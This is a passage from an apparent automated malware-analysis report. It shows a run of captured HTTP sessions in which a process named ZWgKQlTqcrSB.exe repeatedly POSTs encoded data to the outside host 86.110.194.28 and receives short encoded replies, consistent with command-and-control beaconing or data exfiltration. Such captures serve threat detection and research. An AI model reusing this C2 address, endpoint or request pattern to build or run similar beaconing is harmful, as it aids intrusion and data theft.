                                                                                                                                                                        Data Ascii: ^Q[\X_PQT[YZ[^W^_SZ_RPPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<.1]6:S&<0)$415W"4#X394D$?0))#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:10.185713053 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:10.314773083 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:10 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        25192.168.2.44979386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:10.436913967 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:10.793001890 CET2516OUTData Raw: 5b 53 5e 5b 5d 5a 50 58 54 5b 59 5a 5b 51 57 53 5f 54 5a 5d 52 55 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^[]ZPXT[YZ[QWS_TZ]RUPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>%\6R1<+*Y$$>&5V!79W#4X0:$$?3?#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:11.126877069 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        26192.168.2.44979986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:11.205053091 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:11.558619976 CET2108OUTData Raw: 5e 52 5b 5c 5d 5e 55 5c 54 5b 59 5a 5b 5e 57 5f 5f 5d 5a 5f 52 5c 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R[\]^U\T[YZ[^W__]Z_R\PAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(X-^!'20D=82^$')Z25!$>#309,D3+9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:11.910259008 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:12.046986103 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:11 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 27 02 31 28 39 02 3d 2f 01 59 31 0d 25 13 22 0e 20 5e 3b 09 36 43 36 02 0b 59 26 5d 30 1d 2b 3e 3e 41 3c 33 2e 0d 37 3e 0b 10 28 1a 28 5d 03 10 39 5d 28 03 33 5c 3e 00 0c 06 3a 0e 2f 16 33 37 28 58 29 1d 26 0f 32 2f 3a 1e 21 5b 24 0a 3d 23 2d 59 33 28 3f 04 3c 1e 3f 5f 27 07 20 54 0b 17 27 54 24 30 3b 10 26 28 2d 58 3e 37 12 1f 26 2a 3e 09 23 3c 21 0b 34 17 2c 16 2d 20 29 1f 24 06 36 0a 3e 3d 3f 56 31 3a 36 10 24 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: '1(9=/Y1%" ^;6C6Y&]0+>>A<3.7>((]9](3\>:/37(X)&2/:![$=#-Y3(?<?_' T'T$0;&(-X>7&*>#<!4,- )$6>=?V1:6$.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        27192.168.2.44980086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:11.390618086 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:11.746223927 CET2516OUTData Raw: 5e 51 5e 5c 58 5d 50 50 54 5b 59 5a 5b 50 57 53 5f 55 5a 5b 52 51 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q^\X]PPT[YZ[PWS_UZ[RQP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C).!#&<B(("'':',!W6* 8?0*4B0;+9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:12.089428902 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:12.222568035 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:11 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        28192.168.2.44980686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:12.347786903 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:12.699245930 CET2516OUTData Raw: 5e 51 5b 5c 58 56 50 5e 54 5b 59 5a 5b 54 57 5d 5f 50 5a 5f 52 53 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q[\XVP^T[YZ[TW]_PZ_RSP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>*"*#&$>]>^'4%>"4&#09$B'$V))#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:13.056866884 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:13.194523096 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:12 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        29192.168.2.44981486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:13.325643063 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:13.683656931 CET2516OUTData Raw: 5b 54 5b 58 58 56 50 5a 54 5b 59 5a 5b 51 57 5d 5f 56 5a 5f 52 57 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[XXVPZT[YZ[QW]_VZ_RWP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(=-#*(R1,@*0&&Q"!U#4Z' C$?#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:14.024111032 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:14.158556938 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:13 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        30192.168.2.44982386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:14.281400919 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:14.636755943 CET2516OUTData Raw: 5b 57 5e 5e 5d 5b 55 5b 54 5b 59 5a 5b 56 57 5d 5f 54 5a 54 52 56 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [W^^][U[T[YZ[VW]_TZTRVPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(58%,(+$$9%/!5'9P4/%)3(9#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:14.971425056 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:15.098711967 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:14 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        31192.168.2.44982986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:15.234663010 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:15.589934111 CET2516OUTData Raw: 5b 50 5e 5d 58 5a 50 5f 54 5b 59 5a 5b 54 57 53 5f 55 5a 55 52 52 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^]XZP_T[YZ[TWS_UZURRPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D+"#) T2??)-0$Z&6V#800$0S?#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:15.931704998 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:16.062494993 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:15 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        32192.168.2.44983586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:16.185100079 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:16.543001890 CET2516OUTData Raw: 5b 5c 5b 5a 5d 5d 50 50 54 5b 59 5a 5b 51 57 5f 5f 5d 5a 5d 52 52 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[Z]]PPT[YZ[QW__]Z]RRPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(.6 T&+)+'*'/=W 4=V!;0[09+0$()#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:16.887893915 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:17.020055056 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:16 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        33192.168.2.44984186.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:17.064402103 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2080
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:17.418749094 CET2080OUTData Raw: 5b 5c 5e 5d 58 5a 50 59 54 5b 59 5a 5b 5e 57 5d 5f 50 5a 55 52 53 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\^]XZPYT[YZ[^W]_PZURSPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C+!6<1+)._'7)%/)P"$6 +37&?(W?#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:17.785315990 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:17.924994946 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:17 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 58 25 05 3a 5b 29 2f 06 07 31 0a 21 12 35 0e 28 1a 2f 1e 0f 1c 22 5a 29 11 31 15 02 1d 3f 03 3e 41 28 0d 2a 0d 37 00 39 52 2b 30 28 5d 03 10 39 5c 3f 04 20 04 28 3d 31 58 2d 27 0d 5c 24 37 28 5c 3d 0a 2e 09 31 5a 3d 0c 21 5b 33 10 29 1d 2e 07 24 2b 3f 02 3f 30 2b 5a 24 2d 20 54 0b 17 24 0c 27 33 23 12 25 06 21 58 2a 09 38 10 26 2a 25 51 21 3c 0c 56 37 00 28 5d 38 30 3a 0d 27 38 2d 53 3d 07 20 0a 26 03 36 11 33 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $X%:[)/1!5(/"Z)1?>A(*79R+0(]9\? (=1X-'\$7(\=.1Z=![3).$+??0+Z$- T$'3#%!X*8&*%Q!<V7(]80:'8-S= &63.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        34192.168.2.44984486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:17.156656027 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:17.511759996 CET2516OUTData Raw: 5e 52 5b 58 5d 5d 50 5f 54 5b 59 5a 5b 5e 57 53 5f 51 5a 5a 52 52 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R[X]]P_T[YZ[^WS_QZZRRPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&<!_!* W&Z,B*]=0)Z'?)R"&78X'$??#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:17.874753952 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:18.007606983 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:17 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        35192.168.2.44985386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:18.162906885 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:18.511818886 CET2516OUTData Raw: 5b 51 5e 5c 5d 5a 55 5a 54 5b 59 5a 5b 53 57 5b 5f 50 5a 58 52 50 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^\]ZUZT[YZ[SW[_PZXRPPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+-=!&<<B);&X$)Z%?!79#;7$(D'$?9#Y'$X.1
                                                                                                                                                                        Jan 3, 2025 07:58:18.867566109 CET176INHTTP/1.1 100 Continue
                                                                                                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 31 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 3f 55 5d 54
                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 06:58:18 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Content-Type: text/html; charset=UTF-8?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        36192.168.2.44985886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:18.996853113 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
